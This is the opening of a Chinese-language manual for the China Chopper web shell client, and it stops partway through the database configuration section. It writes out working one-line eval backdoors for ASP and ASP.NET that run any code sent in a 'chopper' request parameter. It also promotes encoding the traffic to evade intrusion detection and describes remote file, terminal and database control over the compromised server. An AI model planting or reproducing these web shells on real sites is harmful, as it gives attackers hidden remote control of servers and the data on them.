一、脚本客户端(包括但不限于 EVAL)部分 1)基本信息 Eval服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过 IDS的能力大幅提高。 目前支持的服务端脚本:PHP, ASP, ASP.NET,并且支持 https安全连接的网站。 在服务端运行的代码如下: PHP: ASP: <%eval request("chopper")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> (注意: ASP.NET要单独一个文件或此文件也是 Jscript脚本) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。 此模式可按需定制,比如只要浏览目录,或是只要虚拟终端功能,代码可以很简短。 2)几大功能 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的 pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。 1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2. 虚拟终端:[特色]人性化的设计,操作方便;(输入 HELP查看更多用法), 超长命令会分割为 5k字节一份,分别提交。 3. 数据库管理:[特色]图形界面,支持 MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持 ADO方式连接的数据库。 如果精通 SQL语法,何必还要 PHPMYADMIN呢?而且,菜刀还支持任何脚本的数据库管理呢。 (各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 4. 自写脚本:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。 如果要写自己的 CCC脚本,可以参考一下 CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。 可以在官网下载别人的 CCC脚本,或分享你的得意之作。 注意:由于服务器的安全设置,某些功能可能不能正常使用。 3) 配置信息填写说明 --------------------------------------------------------------------------------------- A) 数据库方面: ----------------------------------------------------------------------------- PHP脚本: 类型 类型可为 MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址 主机地址可为机器名或 IP地址,如 localhost 数据库用户 连接数据库的用户名,如root...
